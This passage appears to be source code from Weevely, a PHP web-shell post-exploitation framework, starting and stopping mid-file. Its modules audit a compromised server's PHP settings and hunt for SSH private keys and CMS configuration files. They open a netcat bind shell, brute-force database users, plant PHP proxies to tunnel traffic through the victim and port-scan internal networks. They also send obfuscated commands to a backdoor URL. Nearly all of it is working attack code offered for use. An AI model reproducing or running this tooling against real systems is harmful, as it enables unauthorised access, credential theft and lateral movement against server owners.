$insecure_features['allow_url_include'] = 'ERR_CONFIG_INCLUDES';
$insecure_features['session.use_trans_sid'] = 'ERR_SESS_TRANS';
foreach ( $insecure_features as $feature_key => $feature_message )
if ((bool)ini_get($feature_key) ) print($feature_key . " " . $feature_message. "|");"""
insecure_classes = """
$insecure_classes = array();
$insecure_classes['splFileObject'] = 'ERR_CONFIG_EXECUTE';
foreach ( $insecure_classes as $class_key => $class_message )
{
if ( class_exists($class_key) ) print($class_key . "() " . $class_message . "|");
}"""
insecure_functions = """
$insecure_functions = array();
$insecure_functions['apache_child_terminate'] = 'ERR_FUNCTION_PROFILE';
$insecure_functions['apache_get_modules'] = 'ERR_FUNCTION_PROFILE';
$insecure_functions['apache_get_version'] = 'ERR_FUNCTION_PROFILE';
$insecure_functions['apache_getenv'] = 'ERR_FUNCTION_PROFILE';
$insecure_functions['get_loaded_extensions'] = 'ERR_FUNCTION_PROFILE';
$insecure_functions['phpinfo'] = 'ERR_FUNCTION_PROFILE';
$insecure_functions['phpversion'] = 'ERR_FUNCTION_PROFILE';
$insecure_functions['chgrp'] = 'WARN_FUNCTION_FILES';
$insecure_functions['chmod'] = 'WARN_FUNCTION_FILES';
$insecure_functions['chown'] = 'WARN_FUNCTION_FILES';
$insecure_functions['copy'] = 'WARN_FUNCTION_FILES';
$insecure_functions['link'] = 'WARN_FUNCTION_FILES';
$insecure_functions['mkdir'] = 'WARN_FUNCTION_FILES';
$insecure_functions['rename'] = 'WARN_FUNCTION_FILES';
$insecure_functions['rmdir'] = 'WARN_FUNCTION_FILES';
$insecure_functions['symlink'] = 'WARN_FUNCTION_FILES';
$insecure_functions['touch'] = 'WARN_FUNCTION_FILES';
$insecure_functions['unlink'] = 'WARN_FUNCTION_FILES';
$insecure_functions['openlog'] = 'ERR_FUNCTION_LOGGING';
$insecure_functions['proc_nice'] = 'ERR_FUNCTION_DISRUPT';
$insecure_functions['syslog'] = 'ERR_FUNCTION_LOGGING';
$insecure_functions['apache_note'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['apache_setenv'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['dl'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['exec'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['passthru'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['pcntl_exec'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['popen'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['proc_close'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['proc_open'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['proc_get_status'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['proc_terminate'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['putenv'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['shell_exec'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['system'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['virtual'] = 'ERR_FUNCTION_EXECUTE';
foreach ( $insecure_functions as $function_key => $function_message )
{
if ( function_exists($function_key) )
print($function_key . "() " . $function_message. "|");
}"""
class Phpconf(Module):
'''Check php security configurations'''
def _set_vectors(self):
self.support_vectors.add_vector('os', 'system.info', ["os"])
self.support_vectors.add_vector('whoami', 'system.info', ["whoami"])
self.support_vectors.add_vector('php_version', 'system.info', ['php_version'])
self.support_vectors.add_vector('open_basedir', 'system.info', ['open_basedir'])
self.support_vectors.add_vector('check_functions', 'shell.php', [ insecure_functions ])
self.support_vectors.add_vector('check_classes', 'shell.php', [ insecure_classes ])
self.support_vectors.add_vector('check_features', 'shell.php', [ insecure_features ])
def __check_os(self):
os = self.support_vectors.get('os').execute()
if 'win' in os.lower():
os = 'win'
else:
os = 'Linux'
self._result['os'] = [ os ]
def __check_version(self):
self._result['PHP version'] = [ self.support_vectors.get('php_version').execute() ]
def __check_username(self):
username = [ self.support_vectors.get('whoami').execute() ]
if self._result['os'] == 'win':
self._result['username\n(%s)' % WARN_CONFIG_PHPUSER_WIN] = username
elif username == 'root':
self._result['username\n(%s)' % ERR_CONFIG_PHPUSER] = username
else:
self._result['username'] = username
def __check_openbasedir(self):
basedir_str = self.support_vectors.get('open_basedir').execute()
err_msg = ERR_CONFIG_BASEDIR
if not basedir_str:
err_msg += ERR_CONFIG_BASEDIR_NOT_SET
self._result_insecurities[err_msg] = [ ]
else:
if self._result['os'] == 'win':
dirs = basedir_str.split(';')
else:
dirs = basedir_str.split(':')
if '.' in dirs:
err_msg += ERR_CONFIG_BASEDIR_CHDIR
trailing_slash = True
for d in dirs:
if self._result['os'] == 'win' and not d.endswith('\\') or self._result['os'] == 'Linux' and not d.endswith('/'):
trailing_slash = False
if not trailing_slash:
err_msg += ERR_CONFIG_BASEDIR_SLASH
self._result_insecurities[err_msg] = dirs
def __check_insecurities(self):
functions_str = self.support_vectors.get('check_functions').execute() + self.support_vectors.get('check_classes').execute() + self.support_vectors.get('check_features').execute()
if functions_str:
functions = findall('([\S]+) ([^|]+)\|',functions_str)
for funct, err in functions:
if err in globals():
error_msg = globals()[err]
if error_msg not in self._result_insecurities:
self._result_insecurities[error_msg] = []
self._result_insecurities[error_msg].append(funct)
def _prepare(self):
self._result = {}
self._result_insecurities = {}
def _probe(self):
self.__check_os()
self.__check_version()
self.__check_username()
self.__check_openbasedir()
self.__check_insecurities()
def _stringify_result(self):
Module._stringify_result(self)
table_insecurities = PrettyTable(['']*(2))
table_insecurities.align = 'l'
table_insecurities.header = False
table_insecurities.hrules = ALL
for res in self._result_insecurities:
if isinstance(self._result_insecurities[res], ListType):
field_str = ''
for chunk in list(chunks(self._result_insecurities[res],3)):
field_str += ', '.join(chunk) + '\n'
table_insecurities.add_row([res, field_str.rstrip() ])
self._output += '\n%s' % ( table_insecurities.get_string())
```
#### File: modules/audit/userfiles.py
```python
from core.module import Module
from core.moduleexception import ProbeException
from core.argparse import ArgumentParser
from ast import literal_eval
from core.utils import join_abs_paths
import os
class Userfiles(Module):
'''Guess files with wrong permissions in users home folders'''
def _set_vectors(self):
self.support_vectors.add_vector('enum', 'file.enum', ["asd", "-pathlist", "$pathlist"])
self.support_vectors.add_vector('users', 'audit.etcpasswd', ["-real"])
def _set_args(self):
self.argparser.add_argument('-auto-web', help='Enumerate common files in /home/*', action='store_true')
self.argparser.add_argument('-auto-home', help='Enumerate common files in /home/*/public_html/', action='store_true')
self.argparser.add_argument('-pathfile', help='Enumerate paths in PATHLIST in /home/*')
self.argparser.add_argument('-pathlist', help='Enumerate path written as [\'path1\', \'path2\',] in /home/*', type=type([]), default=[])
common_files = {
"home" : [ ".bashrc",
".bash_history",
".profile",
".ssh",
".ssh/authorized_keys",
".ssh/known_hosts",
".ssh/id_rsa",
".ssh/id_rsa.pub",
".mysql_history",
".bash_logout",
],
"web" : [ "public_html/",
"public_html/wp-config.php", # wordpress
"public_html/config.php",
"public_html/uploads",
"public_html/configuration.php", # joomla
"public_html/sites/default/settings.php", # drupal
"public_html/.htaccess" ]
}
def _prepare(self):
self._result = {}
if self.args['pathfile']:
try:
filelist=open(os.path.expanduser(self.args['pathfile']),'r').read().splitlines()
except:
raise ProbeException(self.name, "Error opening path list \'%s\'" % self.args['pathfile'])
elif self.args['pathlist']:
filelist = self.args['pathlist']
elif self.args['auto_home']:
filelist = self.common_files['home']
elif self.args['auto_web']:
filelist = self.common_files['web']
else:
filelist = self.common_files['web'] + self.common_files['home']
result = self.support_vectors.get('users').execute()
if not result:
raise ProbeException(self.name, 'Cant extract system users')
self.args['paths'] = []
for u in result:
for f in filelist:
self.args['paths'].append('/' + join_abs_paths([result[u].home, f]) )
def _probe(self):
result = self.support_vectors.get('enum').execute({'pathlist' : str(self.args['paths']) })
for user in result:
if result[user] != ['', '', '', '']:
self._result[user] = result[user]
```
#### File: modules/backdoor/tcp.py
```python
from core.moduleguess import ModuleGuess
from core.moduleexception import ModuleException, ProbeSucceed, ProbeException, ExecutionException
from core.argparse import ArgumentParser
from urlparse import urlparse
from socket import error
from telnetlib import Telnet
from time import sleep
class Tcp(ModuleGuess):
'''Open a shell on TCP port'''
def _set_vectors(self):
self.vectors.add_vector('netcat-traditional','shell.sh', """nc -l -p $port -e $shell""")
self.vectors.add_vector('netcat-bsd', 'shell.sh', """rm -rf /tmp/f;mkfifo /tmp/f;cat /tmp/f|$shell -i 2>&1|nc -l $port >/tmp/f; rm -rf /tmp/f""")
def _set_args(self):
self.argparser.add_argument('port', help='Port to open', type=int)
self.argparser.add_argument('-shell', help='Shell', default='/bin/sh')
self.argparser.add_argument('-vector', choices = self.vectors.keys())
self.argparser.add_argument('-no-connect', help='Skip autoconnect', action='store_true')
def _prepare(self):
self._result = ''
def _execute_vector(self):
self.current_vector.execute_background( { 'port': self.args['port'], 'shell' : self.args['shell'] })
sleep(1)
def _verify_vector_execution(self):
if not self.args['no_connect']:
urlparsed = urlparse(self.modhandler.url)
if urlparsed.hostname:
try:
Telnet(urlparsed.hostname, self.args['port']).interact()
except error, e:
self._result += '%s: %s\n' % (self.current_vector.name, str(e))
raise ExecutionException(self.name, str(e))
```
#### File: modules/bruteforce/sqlusers.py
```python
from core.module import Module
from core.moduleexception import ProbeException, ProbeSucceed
from core.argparse import ArgumentParser
from ast import literal_eval
from core.argparse import SUPPRESS
from os import sep
from string import ascii_lowercase
from random import choice
from re import compile
from sql import Sql
class Sqlusers(Sql):
"""Bruteforce all SQL users"""
def _set_args(self):
self.argparser.add_argument('-hostname', help='DBMS host or host:port', default='127.0.0.1')
self.argparser.add_argument('-wordfile', help='Local wordlist path')
self.argparser.add_argument('-startline', help='Start line of local wordlist', type=int, default=0)
self.argparser.add_argument('-chunksize', type=int, default=5000)
self.argparser.add_argument('-wordlist', help='Try words written as "[\'word1\', \'word2\']"', type=type([]), default=[])
self.argparser.add_argument('-dbms', help='DBMS', choices = ['mysql', 'postgres'], default='mysql')
def _set_vectors(self):
Sql._set_vectors(self)
self.support_vectors.add_vector('users', 'audit.etcpasswd', [])
def _prepare(self):
users = self.support_vectors.get('users').execute()
filtered_username_list = [u for u in users if 'sql' in u.lower() or 'sql' in users[u].descr.lower() or (users[u].uid == 0) or (users[u].uid > 999) or (('false' not in users[u].shell) and ('/home/' in users[u].home)) ]
self.args['username_list'] = filtered_username_list
Sql._prepare(self)
def _probe(self):
result = {}
for user in self.args['username_list']:
self.args['username'] = user
try:
Sql._probe(self)
except ProbeSucceed:
result[user] = self._result[1]
self._result = []
self._result = result
```
#### File: modules/file/check.py
```python
from core.module import Module
from core.moduleexception import ProbeException
from core.argparse import ArgumentParser
import datetime
WARN_INVALID_VALUE = 'Invalid returned value'
class Check(Module):
'''Check remote files type, md5 and permission'''
def _set_vectors(self):
self.support_vectors.add_vector('exists', 'shell.php', "$f='$rpath'; if(file_exists($f) || is_readable($f) || is_writable($f) || is_file($f) || is_dir($f)) print(1); else print(0);")
self.support_vectors.add_vector("md5" ,'shell.php', "print(md5_file('$rpath'));")
self.support_vectors.add_vector("read", 'shell.php', "(is_readable('$rpath') && print(1)) || print(0);")
self.support_vectors.add_vector("write", 'shell.php', "(is_writable('$rpath') && print(1))|| print(0);")
self.support_vectors.add_vector("exec", 'shell.php', "(is_executable('$rpath') && print(1)) || print(0);")
self.support_vectors.add_vector("isfile", 'shell.php', "(is_file('$rpath') && print(1)) || print(0);")
self.support_vectors.add_vector("size", 'shell.php', "print(filesize('$rpath'));")
self.support_vectors.add_vector("time_epoch", 'shell.php', "print(filemtime('$rpath'));")
self.support_vectors.add_vector("time", 'shell.php', "print(filemtime('$rpath'));")
def _set_args(self):
self.argparser.add_argument('rpath', help='Remote path')
self.argparser.add_argument('attr', help='Attribute to check', choices = self.support_vectors.keys())
def _probe(self):
value = self.support_vectors.get(self.args['attr']).execute(self.args)
if self.args['attr'] == 'md5' and value:
self._result = value
elif self.args['attr'] in ('size', 'time_epoch', 'time'):
try:
self._result = int(value)
except ValueError, e:
raise ProbeException(self.name, "%s: '%s'" % (WARN_INVALID_VALUE, value))
if self.args['attr'] == 'time':
self._result = datetime.datetime.fromtimestamp(self._result).strftime('%Y-%m-%d %H:%M:%S')
elif value == '1':
self._result = True
elif value == '0':
self._result = False
else:
raise ProbeException(self.name, "%s: '%s'" % (WARN_INVALID_VALUE, value))
```
#### File: modules/file/read.py
```python
from modules.file.download import Download
from tempfile import NamedTemporaryFile
from core.argparse import ArgumentParser
from core.moduleguess import ModuleGuess
class Read(Download):
'''Read remote file'''
def _set_args(self):
self.argparser.add_argument('rpath')
self.argparser.add_argument('-vector', choices = self.vectors.keys())
def _verify_vector_execution(self):
file = NamedTemporaryFile()
file.close()
self.args['lpath'] = file.name
return Download._verify_vector_execution(self)
def _stringify_result(self):
self._result = self._content
return ModuleGuess._stringify_result(self)
```
#### File: net/external/local_proxy.py
```python
import SocketServer
import urllib
from thread import start_new_thread
from sys import argv, exit
import re
class ProxyHandler(SocketServer.StreamRequestHandler):
def __init__(self, request, client_address, server):
self.proxies = {}
self.useragent = server.agent
self.phpproxy = server.rurl
try:
SocketServer.StreamRequestHandler.__init__(self, request, client_address,server)
except Exception, e:
raise
def handle(self):
req, body, cl, req_len, read_len = '', 0, 0, 0, 4096
try:
while 1:
if not body:
line = self.rfile.readline(read_len)
if line == '':
# send it anyway..
self.send_req(req)
return
#if line[0:17].lower() == 'proxy-connection:':
# req += "Connection: close\r\n"
# continue
req += line
if not cl:
t = re.compile('^Content-Length: (\d+)', re.I).search(line)
if t is not None:
cl = int(t.group(1))
continue
if line == "\015\012" or line == "\012":
if not cl:
self.send_req(req)
return
else:
body = 1
read_len = cl
else:
buf = self.rfile.read(read_len)
req += buf
req_len += len(buf)
read_len = cl - req_len
if req_len >= cl:
self.send_req(req)
return
except Exception, e:
raise
def send_req(self, req):
#print req
if req == '':
return
ua = urllib.FancyURLopener(self.proxies)
ua.addheaders = [('User-Agent', self.useragent)]
r = ua.open(self.phpproxy, urllib.urlencode({'req': req}))
while 1:
c = r.read(2048)
if c == '': break
self.wfile.write(c)
self.wfile.close()
if __name__ == "__main__":
if len(argv) < 5:
print '[!] Usage: ./local_proxy.py <localhost> <localport> <rurl> <useragent>'
exit(1)
lhost = argv[1]
lport = int(argv[2])
rurl = argv[3]
agent = argv[4]
SocketServer.TCPServer.allow_reuse_address = True
server = SocketServer.ThreadingTCPServer((lhost, lport), ProxyHandler)
server.rurl = rurl
server.agent = agent
server.serve_forever()
```
#### File: modules/net/ifaces.py
```python
from core.module import Module
from core.moduleexception import ModuleException, ProbeException
from core.argparse import ArgumentParser
from external.ipaddr import IPNetwork
import re
WARN_NO_OUTPUT = 'No execution output'
WARN_NO_IFACES = 'No interfaces address found'
class Ifaces(Module):
'''Print interfaces addresses'''
def _set_vectors(self):
self.support_vectors.add_vector('enum', 'file.enum', ["asd", "-pathlist", "$pathlist"])
self.support_vectors.add_vector( "ifconfig" , 'shell.sh', "$ifconfig_path")
def _probe(self):
self._result = {}
enum_pathlist = str([ x + 'ifconfig' for x in ['/sbin/', '/bin/', '/usr/bin/', '/usr/sbin/', '/usr/local/bin/', '/usr/local/sbin/'] ])
ifconfig_pathlist = self.support_vectors.get('enum').execute({'pathlist' : enum_pathlist })
for path in ifconfig_pathlist:
if ifconfig_pathlist[path] != ['','','','']:
result = self.support_vectors.get('ifconfig').execute({'ifconfig_path' : path })
if result:
ifaces = re.findall(r'^(\S+).*?inet addr:(\S+).*?Mask:(\S+)', result, re.S | re.M)
if ifaces:
for iface in ifaces:
ipnet = IPNetwork('%s/%s' % (iface[1], iface[2]))
self._result[iface[0]] = ipnet
else:
raise ProbeException(self.name, '\'%s\' %s' % (path, WARN_NO_OUTPUT))
def _verify(self):
if not self._result:
raise ProbeException(self.name, WARN_NO_IFACES)
```
#### File: modules/net/phpproxy.py
```python
from modules.file.upload2web import Upload2web
from modules.file.upload import WARN_NO_SUCH_FILE
from core.moduleexception import ModuleException, ProbeException
from core.argparse import ArgumentParser
from core.argparse import SUPPRESS
import re, os
from core.utils import randstr
class Phpproxy(Upload2web):
'''Install remote PHP proxy'''
def _set_args(self):
self.argparser.add_argument('rpath', help='Optional, upload as rpath', nargs='?')
self.argparser.add_argument('-startpath', help='Upload in first writable subdirectory', metavar='STARTPATH', default='.')
self.argparser.add_argument('-chunksize', type=int, default=1024, help=SUPPRESS)
self.argparser.add_argument('-vector', choices = self.vectors.keys(), help=SUPPRESS)
self.argparser.add_argument('-force', action='store_true')
def _get_proxy_path(self):
return os.path.join(self.modhandler.path_modules, 'net', 'external', 'phpproxy.php')
def _prepare(self):
proxy_path = self._get_proxy_path()
if not self.args['rpath']:
# If no rpath, set content and remote final filename as random
try:
content = open(proxy_path, 'r').read()
except Exception, e:
raise ProbeException(self.name, '\'%s\' %s' % (proxy_path, WARN_NO_SUCH_FILE))
self.args['lpath'] = randstr(4) + '.php'
self.args['content'] = content
else:
# Else, set lpath as proxy filename
self.args['lpath'] = proxy_path
self.args['content'] = None
Upload2web._prepare(self)
def _stringify_result(self):
Upload2web._stringify_result(self)
sess_filename = os.path.join(*(self.args['rpath'].split('/')[:-1] + [ 'sess_*']))
self._output = """Php proxy installed, point your browser to %s?u=http://www.google.com .
Delete '%s' and '%s' at session end.""" % ( self.args['url'], self.args['rpath'], sess_filename )
```
#### File: modules/net/proxy.py
```python
from modules.file.upload2web import Upload2web
from modules.net.phpproxy import Phpproxy
from core.moduleexception import ProbeSucceed, ProbeException
from core.argparse import ArgumentParser
from core.argparse import SUPPRESS
from os import path
from random import choice
from core.http.request import agent
from core.utils import url_validator
from subprocess import Popen
from sys import executable
WARN_NOT_URL = 'Not a valid URL'
class Proxy(Phpproxy):
'''Install and run a proxy to tunnel traffic through the target'''
def _set_args(self):
self.argparser.add_argument('rpath', help='Optional, upload as rpath', nargs='?')
self.argparser.add_argument('-startpath', help='Upload in first writable subdirectory', metavar='STARTPATH', default='.')
self.argparser.add_argument('-force', action='store_true')
self.argparser.add_argument('-just-run', metavar='URL')
self.argparser.add_argument('-just-install', action='store_true')
self.argparser.add_argument('-lhost', default='127.0.0.1')
self.argparser.add_argument('-lport', default='8081', type=int)
self.argparser.add_argument('-chunksize', type=int, default=1024, help=SUPPRESS)
self.argparser.add_argument('-vector', choices = self.vectors.keys(), help=SUPPRESS)
def _get_proxy_path(self):
return path.join(self.modhandler.path_modules, 'net', 'external', 'proxy.php')
def _get_local_proxy_path(self):
return path.join(self.modhandler.path_modules, 'net', 'external', 'local_proxy.py')
def _prepare(self):
if not self.args['just_run']:
Phpproxy._prepare(self)
else:
if not url_validator.match(self.args['just_run']):
raise ProbeException(self.name, '\'%s\': %s' % (self.args['just_run'], WARN_NOT_URL) )
self.args['url'] = self.args['just_run']
self.args['rpath'] = ''
def _probe(self):
if not self.args['just_run']:
try:
Phpproxy._probe(self)
except ProbeSucceed:
pass
if not self.args['just_install']:
self.pid = Popen([executable, self._get_local_proxy_path(), self.args['lhost'], str(self.args['lport']), self.args['url'], agent]).pid
def _verify(self):
if not self.args['just_run']:
Phpproxy._verify(self)
else:
# With just_run, assume a good result so the output prints correctly
self._result = True
def _stringify_result(self):
Phpproxy._stringify_result(self)
rpath = ' '
if self.args['rpath']:
rpath = '\'%s\' ' % self.args['rpath']
self._result.append(self.pid)
self._output = """Proxy daemon spawned, set \'http://%s:%i\' as HTTP proxy to start browsing anonymously through target.
Run ":net.proxy -just-run '%s'" to respawn local proxy daemon without reinstalling remote agent.
When not needed anymore, remove remote file with ":file.rm %s" and run locally 'kill -9 %i' to stop proxy.""" % (self.args['lhost'], self.args['lport'], self.args['url'], rpath, self.pid)
```
#### File: modules/net/scan.py
```python
from core.module import Module
from core.moduleexception import ModuleException, ProbeException
from core.argparse import ArgumentParser
from external.ipaddr import IPNetwork, IPAddress, summarize_address_range
from socket import gethostbyname
import re, os
from core.argparse import SUPPRESS
from core.utils import randstr
from base64 import b64encode
WARN_NO_SUCH_FILE = 'No such file or permission denied'
WARN_INVALID_SCAN = 'Invalid scan range, check syntax'
class Scan(Module):
'''Port scan open TCP ports'''
def _set_vectors(self):
self.support_vectors.add_vector('ifaces', 'net.ifaces', [])
self.support_vectors.add_vector( 'scan', 'shell.php',["""$str = base64_decode($_POST["$post_field"]);
foreach (explode(',', $str) as $s) {
$s2 = explode(' ', $s);
foreach( explode('|', $s2[1]) as $p) {
if($fp = fsockopen("$s2[0]", $p, $n, $e, $timeout=1)) {print(" $s2[0]:$p"); fclose($fp);}
}print(".");}""", "-post", "{\'$post_field\' : \'$data\' }"])
def _set_args(self):
self.argparser.add_argument('addr', help='Single IP, multiple: IP1,IP2,.., networks IP/MASK or firstIP-lastIP, interfaces (ethN)')
self.argparser.add_argument('port', help='Single port, multiple: PORT1,PORT2,.. or firstPORT-lastPORT')
self.argparser.add_argument('-unknown', help='Scan also unknown ports', action='store_true')
self.argparser.add_argument('-ppr', help=SUPPRESS, default=10, type=int)
def _get_service_path(self):
return os.path.join(self.modhandler.path_modules, 'net', 'external', 'nmap-services-tcp.txt')
def _prepare(self):
services_path = self._get_service_path()
try:
services = open(services_path, 'r').read()
except Exception, e:
raise ProbeException(self.name, '\'%s\' %s' % (services_path, WARN_NO_SUCH_FILE))
ifaces_all = self.support_vectors.get('ifaces').execute()
reqlist = RequestList(self.modhandler, services, ifaces_all)
reqlist.add(self.args['addr'], self.args['port'])
if not reqlist:
raise ProbeException(self.name, WARN_INVALID_SCAN)
if self.args['ppr'] == 10 and self.args['addr'] == '127.0.0.1':
self.args['ppr'] = 100
self.args['reqs'] = reqlist
def _probe(self):
while self.args['reqs']:
reqstringarray = ''
requests = self.args['reqs'].get_requests(self.args['ppr'])
for host, ports in requests.items():
portschunk = map(str, (ports))
reqstringarray += '%s %s,' % (host, '|'.join(portschunk))
output = 'SCAN %s:%s-%s ' % (host, portschunk[0], portschunk[-1])
result = self.support_vectors.get('scan').execute({'post_field' : randstr(), 'data' : b64encode('%s' % reqstringarray[:-1])})
if result != '.':
output += 'OPEN: ' + result.strip()[:-1]
self._result += result.strip()[:-1]
print output
def _stringify_result(self):
self._output = ''
class RequestList(dict):
def __init__(self, modhandler, nmap_file, ifaces):
self.modhandler = modhandler
self.port_list = []
self.ifaces = ifaces
self.nmap_ports = []
self.nmap_services = {}
for line in nmap_file.splitlines():
name, port = line.split()
self.nmap_services[int(port)] = name
self.nmap_ports.append(int(port))
dict.__init__(self)
def get_requests(self, howmany):
to_return = {}
requests = 0
# Filling request
for ip in self:
while self[ip]:
if requests >= howmany:
break
if ip not in to_return:
to_return[ip] = []
to_return[ip].append(self[ip].pop(0))
requests+=1
if requests >= howmany:
break
# Removing empty ips
for ip, ports in self.items():
if not ports:
del self[ip]
return to_return
def add(self, net, port):
""" First add port to duplicate for every inserted host """
if ',' in port:
port_ranges = port.split(',')
else:
port_ranges = [ port ]
for ports in port_ranges:
self.__set_port_ranges(ports)
# If there are available ports
if self.port_list:
if ',' in net:
addresses = net.split(',')
else:
addresses = [ net ]
for addr in addresses:
self.__set_networks(addr)
def __set_port_ranges(self, given_range):
start_port = None
end_port = None
if given_range.count('-') == 1:
try:
splitted_ports = [ int(strport) for strport in given_range.split('-') if (int(strport) > 0 and int(strport) <= 65535)]
except ValueError:
return None
else:
if len(splitted_ports) == 2:
start_port = splitted_ports[0]
end_port = splitted_ports[1]
else:
try:
int_port = int(given_range)
except ValueError:
return None
else:
start_port = int_port
end_port = int_port
if start_port and end_port:
self.port_list += [ p for p in range(start_port, end_port+1) if p in self.nmap_ports]
else:
raise ModuleException('net.scan', 'Error parsing port numbers \'%s\'' % given_range)
def __get_network_from_ifaces(self, iface):
if iface in self.ifaces.keys():
return self.ifaces[iface]
def __set_networks(self, addr):
networks = []
try:
# Parse single IP or networks
networks.append(IPNetwork(addr))
except ValueError:
# Parse IP-IP
if addr.count('-') == 1:
splitted_addr = addr.split('-')
# Only address supported
try:
start_address = IPAddress(splitted_addr[0])
end_address = IPAddress(splitted_addr[1])
except ValueError:
pass
else:
networks += summarize_address_range(start_address, end_address)
else:
# Parse interface name
remote_iface = self.__get_network_from_ifaces(addr)
if remote_iface:
networks.append(remote_iface)
else:
# Try to resolve host
try:
networks.append(IPNetwork(gethostbyname(addr)))
except:
pass
if not networks:
print '[net.scan] Warning: \'%s\' is not an IP address, network or detected interface' % ( addr)
else:
for net in networks:
for ip in net:
self[str(ip)] = self.port_list[:]
```
#### File: modules/shell/php.py
```python
from core.module import Module
from core.moduleexception import ModuleException, ProbeException, ProbeSucceed, InitException
from core.http.cmdrequest import CmdRequest, NoDataException
from core.argparse import ArgumentParser, StoredNamespace
from core.argparse import SUPPRESS
from ast import literal_eval
import random, os, shlex, types
WARN_PROXY = 'Proxies can break weevely requests, use proxychains'
WARN_TRAILING_SEMICOLON = 'command does not have trailing semicolon'
WARN_NO_RESPONSE = 'No response'
WARN_UNREACHABLE = 'URL or proxy unreachable'
WARN_CONN_ERR = 'Error connecting to backdoor URL or proxy'
WARN_INVALID_RESPONSE = 'skipping invalid response'
WARN_PHP_INTERPRETER_FAIL = 'PHP and Shell interpreters load failed'
MSG_PHP_INTERPRETER_SUCCEED = 'PHP and Shell interpreters load succeed'
class Php(Module):
'''Execute PHP statement'''
mode_choices = ['Cookie', 'Referer' ]
def _init_stored_args(self):
self.stored_args_namespace = StoredNamespace()
setattr(self.stored_args_namespace, 'mode', None)
setattr(self.stored_args_namespace, 'path', '')
def _set_args(self):
self.argparser.add_argument('cmd', help='PHP command enclosed with brackets and terminated by a semicolon', nargs='+' )
self.argparser.add_argument('-mode', help='Obfuscation mode', choices = self.mode_choices)
self.argparser.add_argument('-proxy', help='HTTP proxy. Support \'http://\', \'socks5://\', \'socks4://\'')
self.argparser.add_argument('-precmd', help='Insert string at beginning of commands', nargs='+' )
self.argparser.add_argument('-debug', help='Change debug class (3 or less to show request and response)', type=int, default=4, choices =range(1,5))
self.argparser.add_argument('-post', help=SUPPRESS, type=type({}), default={})
self.argparser.add_argument('-just-probe', help=SUPPRESS, action='store_true')
def _set_vectors(self):
self.support_vectors.add_vector(name='ls', interpreter='file.ls', payloads = [ '$rpath' ])
def _prepare(self):
# Slacky backdoor validation.
# Avoid probing (and storing) if mode is specified by user
if not self.args['mode'] or self.args['just_probe']:
if not getattr(self.stored_args_namespace,'mode') or self.args['just_probe']:
self.__slacky_probe()
self.args['mode'] = getattr(self.stored_args_namespace,'mode')
# If the raw command is not 'ls', treat it as PHP code
if self.args['cmd'][0][:2] != 'ls':
# Warn about not ending semicolon
if self.args['cmd'] and self.args['cmd'][-1][-1] not in (';', '}'):
self.mprint('\'..%s\' %s' % (self.args['cmd'][-1], WARN_TRAILING_SEMICOLON))
# Prepend chdir
if getattr(self.stored_args_namespace,'path'):
self.args['cmd'] = [ 'chdir(\'%s\');' % (getattr(self.stored_args_namespace,'path')) ] + self.args['cmd']
# Prepend precmd
if self.args['precmd']:
self.args['cmd'] = self.args['precmd'] + self.args['cmd']
def _probe(self):
# If 'ls', execute __ls_handler
if self.args['cmd'][0][:2] == 'ls':
rpath = ''
if ' ' in self.args['cmd'][0]:
rpath = self.args['cmd'][0].split(' ')[1]
self._result = '\n'.join(self.support_vectors.get('ls').execute({'rpath' : rpath }))
else:
self._result = self.__do_request(self.args['cmd'], self.args['mode'])
def __do_request(self, listcmd, mode):
cmd = listcmd
if isinstance(listcmd, types.ListType):
cmd = ' '.join(listcmd)
request = CmdRequest( self.modhandler.url, self.modhandler.password, self.args['proxy'])
request.setPayload(cmd, mode)
msg_class = self.args['debug']
if self.args['post']:
request.setPostData(self.args['post'])
self.mprint( "Post data values:", msg_class)
for field in self.args['post']:
self.mprint(" %s (%i)" % (field, len(self.args['post'][field])), msg_class)
self.mprint( "Request: %s" % (cmd), msg_class)
try:
response = request.execute()
except NoDataException, e:
raise ProbeException(self.name, WARN_NO_RESPONSE)
except IOError, e:
raise ProbeException(self.name, '%s. %s' % (e.strerror, WARN_UNREACHABLE))
except Exception, e:
raise ProbeException(self.name, '%s. %s' % (str(e), WARN_CONN_ERR))
if 'eval()\'d code' in response:
if len(response)>=100:
response_sum = '...' + response[-100:]
else:
response_sum = response
raise ProbeException(self.name, '%s: \'%s\'' % (WARN_INVALID_RESPONSE, response_sum))
self.mprint( "Response: %s" % response, msg_class)
return response
def __slacky_probe(self):
for currentmode in self.mode_choices:
rand = str(random.randint( 11111, 99999 ))
try:
response = self.__do_request('print(%s);' % (rand), currentmode)
except ProbeException, e:
self.mprint('%s with %s method' % (e.error, currentmode))
continue
if response == rand:
setattr(self.stored_args_namespace, 'mode', currentmode)
if self.args['just_probe']:
self._result = True
raise ProbeSucceed(self.name, MSG_PHP_INTERPRETER_SUCCEED)
return
raise InitException(self.name, WARN_PHP_INTERPRETER_FAIL)
```
#### File: modules/sql/console.py
```python
from core.module import Module
from core.moduleexception import ModuleException, ProbeException
from core.argparse import ArgumentParser, StoredNamespace
import re
WARN_NO_DATA = 'No data returned'
WARN_CHECK_CRED = 'check credentials and dbms availability'
class Console(Module):
'''Run SQL console or execute single queries'''
def _set_vectors(self):
self.support_vectors.add_vector('mysql', 'shell.php', ["""if(mysql_connect("$host","$user","$pass")){
$result = mysql_query("$query"); if($result) {
while ($content = mysql_fetch_row($result)) {
foreach($content as $key => $value){echo $value . "|";} echo "\n";}}
mysql_close();}""" ])
self.support_vectors.add_vector('mysql_fallback', 'shell.php', [ """$result = mysql_query("$query");
if($result) {
while ($content = mysql_fetch_row($result)) {
foreach($content as $key => $value){echo $value . "|";} echo "\n";}}"""]),
self.support_vectors.add_vector('pg', 'shell.php', ["""if(pg_connect("host=$host user=$user password=$pass")){
$result = pg_query("$query"); if($result) {
while ($content = pg_fetch_row($result)) {
